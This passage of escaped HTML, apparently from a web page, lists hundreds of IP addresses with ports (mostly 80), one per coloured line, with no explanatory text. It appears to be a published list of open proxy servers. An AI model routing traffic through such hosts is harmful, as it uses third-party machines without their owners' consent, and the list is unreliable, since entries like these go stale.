204);"&gt;222.58.225.183:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.182:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.181:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.176:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.172:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.171:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.150:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.163:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.160:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.152:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.148:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.145:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.144:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.139:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.143:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.137:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.136:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.133:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.129:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.128:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.169.11.234:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.215.230.205:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.168.10.163:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.165.133.198:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.161.137.205:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.127.108.30:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.223.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.198.136:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.159.34.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.132.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.9.255.117:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.7.209.52:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.129.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.241.218.165:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.176.88.94:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.70:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.62:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.61:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.60:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.38:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.37:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.253:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.254:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.252:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.108.50.67:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.72:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.201.21.176:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.69:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.227:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.73:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.121:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.226.30.116:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;144.140.41.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.249:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.89:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.207:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.233:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.211:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.197:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.108.14.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.225:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.201.21.175:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.243:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;60.217.232.51:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.122.124.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;220.113.9.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.16.144.133:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;121.10.120.214:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.38:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.162.249:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.226:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.201.21.177:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.162.245:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.201.21.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.25:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.247:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.245:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.241:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;220.248.3.203:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.235:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.239:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;220.117.210.38:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;220.225.77.140:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;220.128.122.187:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;220.234.246.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.255.135.180:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;220.227.242.227:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.140.165.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.9.124.253:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.90.171.249:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.78.215.175:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.69.96.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.56.64.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.50.52.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.122.213.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.248.21.194:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.210.199.254:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.14.227.197:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.115.187.140:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.163.162.185:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.77.186.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.188.61.52:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.248.245:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.242.246:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.248.55:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.227.124:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.13.20.99:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.150.32.86:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.112.217.218:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.81.48.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.44.249.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.16.122.83:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.50.52.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.49.160.27:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.156:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.79:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.62:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.37:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.44:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.246:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.237:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.252:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.217:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.201:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.182:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.175:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.186:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.157:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.140:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.145:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.134:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.117.195.61:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.109.73.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.109.113.108:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.124.105.138:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.0.96.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213-153-62-110.stat.salzburg-online.at:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.93.222.117:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.31.241.223:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.42.178.199:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.27.244.236:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.29.150.140:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.205.99.185:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.194.111.99:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.226.190.225:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.163.50.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.212.10.35:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.135.48.118:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.40.7.114:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.33.197.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.0.20.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.red-213-96-201.staticip.rima-tde.net:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.89.6.227:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.78.67.254:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.76.127.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.67.148.72:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.62.111.37:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.34.135.54:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.179.36.150:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.238.242.87:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.167.84.75:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.163.225.91:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.162.118.173:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.93.99.51:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.68.154.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.12.238:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.243.72.81:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.24.238.155:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.255.192.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.21.228.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.199.197.121:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.175.191.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.162.143.213:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.154.208.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.142.138.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.138.86.21:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.12.252.124:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.12.252.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.198.184.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.122.88.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.13.33.219:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.127.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.72.226.35:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.248.117.124:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.123.46:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.239.84.220:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.233.32.187:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.222.202.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.21.95.124:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.161.79.165:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.144.106.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.199:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.99.1.1:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.5.71.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.253.208.91:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.212.78.67:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.248.82.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.204.99.137:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.125.239.49:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.113.148:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.108.169:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.103.35:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.102.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.235.218.83:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.20.82.244:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.171.32.139:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.14.5.104:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.144.240.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.98.34.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.108.185.47:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.89.209.155:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.77.151.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.77.151.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.73.142.231:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.71.63.135:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.52.81.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.52.80.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.52.80.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.57.151.67:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.43.128.233-static.reverse.softlayer.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.29.194.229:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.196.22.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;192.80.24.201:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.108.148.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;192.87.100.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;123.201.19.71:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;192.207.27.44:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;123.201.17.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;192.18.102.59:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.100.40.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.255.171:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.255.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;190.41.110.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;123.201.10.103:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.255.167:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.255.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.248.127:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.35.172.215:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;190.145.77.36:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.23.36.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.53.252.104:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.224.254.5:554&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;19.105.60.190.host.ifxnetworks.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;123.108.103.214:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;189.72.161.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;205.238.226.251:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;205.209.149.25:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;205.209.149.24:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;122.224.33.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;204.236.225.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;204.196.215.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;189.44.163.18:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.13.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.46.9.114:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.45.114.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.108.122.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.148.19.148:80&lt;/span&gt;&lt;br /&gt;&lt;span 